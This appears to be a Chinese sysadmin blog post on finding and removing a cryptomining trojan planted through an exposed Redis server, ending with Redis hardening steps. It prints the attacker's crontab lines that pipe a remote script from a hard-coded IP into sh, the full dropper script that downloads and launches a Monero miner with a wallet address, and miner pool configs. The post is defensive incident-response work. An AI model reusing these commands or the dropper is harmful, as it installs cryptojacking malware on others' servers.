Redis漏洞挖矿木马清除

最近两天服务器莫名的cpu100%报警，一看有个/tmp/systemd-logind进程一直占有cpu资源：

htop查看，F6选择CPU

/tmp/systemd-logind -c /tmp/logind.conf -u xxxxxxxxxxxx

查看conf文件

  1 {
  2     "url" : "stratum+tcp://212.129.44.156:80",
  3     "url" : "stratum+tcp://62.210.29.108:80",
  4     "url" : "stratum+tcp://212.129.46.191:80",
  5     "url" : "stratum+tcp://212.129.44.155:80",
  6     "url" : "stratum+tcp://212.83.129.195:80",
  7     "url" : "stratum+tcp://212.129.44.157:80",
 11     "pass" : "x",
 12     "algo" : "cryptonight",
 13     "quiet" : true
 14 }   

最简单作法，杀进程，删除文件，看下如何。

killall systemd-logind & rm -rf /tmp/systemd-logind  /tmp/logind.conf

不过一个小时后，又报警，说明它会自动启动，查看crontab

crontab -l 

45 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh
45 * * * * curl http://91.230.47.41/common/logo.jpg|sh

每个整点45分，启动下载然后执行脚本。

这次要谨慎一下，先通过Iptable将这个下载地址给禁止了

iptables -A INPUT -s 91.230.47.41 -j DROPiptables -A OUTPUT -d 91.230.47.41 -j DROP
iptables -A INPUT -s 91.230.47.41 -j DROPiptables -A OUTPUT -d 91.230.47.41 -j DROP

自动下载上述脚本，分析其行为：

curl http://91.230.47.41/common/logo.jpg > miner.sh

1 #!/bin/sh                                                                                                                                                                                                                                      
  2 rm -rf /tmp/index_bak.*
  3 rm -rf /tmp/httpd.conf.*
  4 rm -rf /tmp/httpd.conf
  5 pkill -f stratum
  6 pkill -f "/tmp/apache"
  7 pkill -f "/tmp/httpd.conf"
  8 ps auxf|grep -v grep|grep "/tmp/apache"|awk '{print $2}'|xargs kill -9
  9 ps auxf|grep -v grep|grep "/tmp/httpd.conf"|awk '{print $2}'|xargs kill -9
 10 ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
 11 ps -fe|grep 43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R  |grep -v grep
 12 if [ $? -ne 0 ]
 13 then
 14 echo "start process....."
 15 chmod 777 /tmp/logind.conf
 16 rm -rf /tmp/logind.conf
 17 curl -o /tmp/logind.conf http://91.230.47.41/common/logind.conf
 18 wget -O /tmp/logind.conf http://91.230.47.41/common/logind.conf
 19 chmod 777 /tmp/systemd-logind
 20 rm -rf /tmp/systemd-logind
 21 cat /proc/cpuinfo|grep aes>/dev/null
 22 if [ $? -ne 1 ]
 23 then
 24 curl -o /tmp/systemd-logind http://91.230.47.41/common/systemd-logind
 25 wget -O /tmp/systemd-logind http://91.230.47.41/common/systemd-logind
 26 else
 27 curl -o /tmp/systemd-logind http://91.230.47.41/common/systemd-logind_na
 28 wget -O /tmp/systemd-logind http://91.230.47.41/common/systemd-logind_na
 29 fi
 30 chmod +x /tmp/systemd-logind
 31 nohup /tmp/systemd-logind -c /tmp/logind.conf -u 43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R >/dev/null &
 32 else
 33 echo "runing....."
 34 fi
 35 

大意如下：

先将自己的之前的进程杀掉， 如果没有找到自己的木马进程，则下载配置文件logind.conf ，添加为木马执行权限，根据CPU是否支持aes加密指令集下载不同的木马本体，然后执行它

了解了木马的原理，好办了。

先把下载木马的ip封了，然后把木马cron任务清除，将本体删除。

先将之前的清除过程再执行一次，再把crontab里任务清除.

再查看其它重要的地方：

1. /etc/, /user/etc/, /user/local/etc

找到一个:/usr/local/etc/minerd.conf，查看内容

-B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:6666 -u 448J3JccPv4D8XWvFJ6wFwLZuVtYdQSSFKoKnLS5pU4EL6SfsGvg4AAHqNeLK8LguDFpJtcFJ6ZWr1NAbuEVmHEz5JftEox -p x

删除它。

2. /etc/ssh/

顺便查看下该目录下有没有非法的ssh授权访问，如果有的话，删除。

3. 清除其它残余变体

ps aux 查看可疑进程

root     16612     1  0 03:59 ?        00:00:08 ./get
root     16691     1  0 04:00 ?        00:00:00 /usr/bin/.sshd

先看.ssd

# ls /usr/bin/.sshd  -l
-rwxr-xr-x 1 root root 1223123 Apr  8 04:00 /usr/bin/.sshd
# file /usr/bin/.sshd 
/usr/bin/.sshd: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped

是今天凌晨创建的，肯定有问题，删除并kill掉

再来看./get，无法查看到它的路径，通过进程信息来反查

#cd /prod/16612/

#ll exe 

lrwxrwxrwx 1 root root 0 Apr  8 13:38 exe -> /usr/local/apache-tomcat-8.0.38/bin/get

查看get信息

# ll
total 2000
-rw-r--r-- 1 root root   32279 Oct  7  2016 bootstrap.jar
-rw-r--r-- 1 root root   15026 Oct  7  2016 catalina.bat
-rwxr-xr-x 1 root root   22443 Oct  7  2016 catalina.sh
-rw-r--r-- 1 root root    1647 Oct  7  2016 catalina-tasks.xml
-rw-r--r-- 1 root root   24283 Oct  7  2016 commons-daemon.jar
-rw-r--r-- 1 root root  204944 Oct  7  2016 commons-daemon-native.tar.gz
-rw-r--r-- 1 root root    2040 Oct  7  2016 configtest.bat
-rwxr-xr-x 1 root root    1922 Oct  7  2016 configtest.sh
-rw-r--r-- 1 root root      73 Apr  8 04:00 conf.n
-rwxr-xr-x 1 root root    7888 Oct  7  2016 daemon.sh
-rw-r--r-- 1 root root    2091 Oct  7  2016 digest.bat
-rwxr-xr-x 1 root root    1965 Oct  7  2016 digest.sh
-rwxrwxrwx 1 root root 1223123 Apr  5 23:57 get
drwxr-xr-x 2 root root    4096 Nov 29 10:01 logs
-rw-r--r-- 1 root root    3430 Oct  7  2016 setclasspath.bat
-rwxr-xr-x 1 root root    3547 Oct  7  2016 setclasspath.sh
-rw-r--r-- 1 root root    2020 Oct  7  2016 shutdown.bat
-rwxr-xr-x 1 root root    1902 Oct  7  2016 shutdown.sh
-rw-r--r-- 1 root root    2022 Oct  7  2016 startup.bat
-rwxr-xr-x 1 root root    1904 Oct  7  2016 startup.sh
-rw-r--r-- 1 root root   40853 Oct  7  2016 tomcat-juli.jar
-rw-r--r-- 1 root root  391853 Oct  7  2016 tomcat-native.tar.gz
-rw-r--r-- 1 root root    4057 Oct  7  2016 tool-wrapper.bat
-rwxr-xr-x 1 root root    5061 Oct  7  2016 tool-wrapper.sh
-rw-r--r-- 1 root root    2026 Oct  7  2016 version.bat
-rwxr-xr-x 1 root root    1908 Oct  7  2016 version.sh

前几天新创建的文件，它和.ssd文件大小一样，并且它创建日期最早，很有可能是感染源，隐藏在了tomcat的目录下。

通过阿里云的木马查杀，发现了更多的变种：

https://help.aliyun.com/knowledge_detail/38083.html

PS：文件修改监控工具：auditctl

## 木马原因

估计是redis漏洞导致：

http://blog.jobbole.com/94518/

下面是解决办法和清除工作

1. 修复 redis 的后门,

1. 配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
2. 配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
3. 配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
4. 好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf

参考资源：

http://www.itnpc.com/news/web/1473388548113704.html

http://www.itnpc.com/news/web/1472040058107584.html

http://www.cnblogs.com/zhouto/p/5680594.html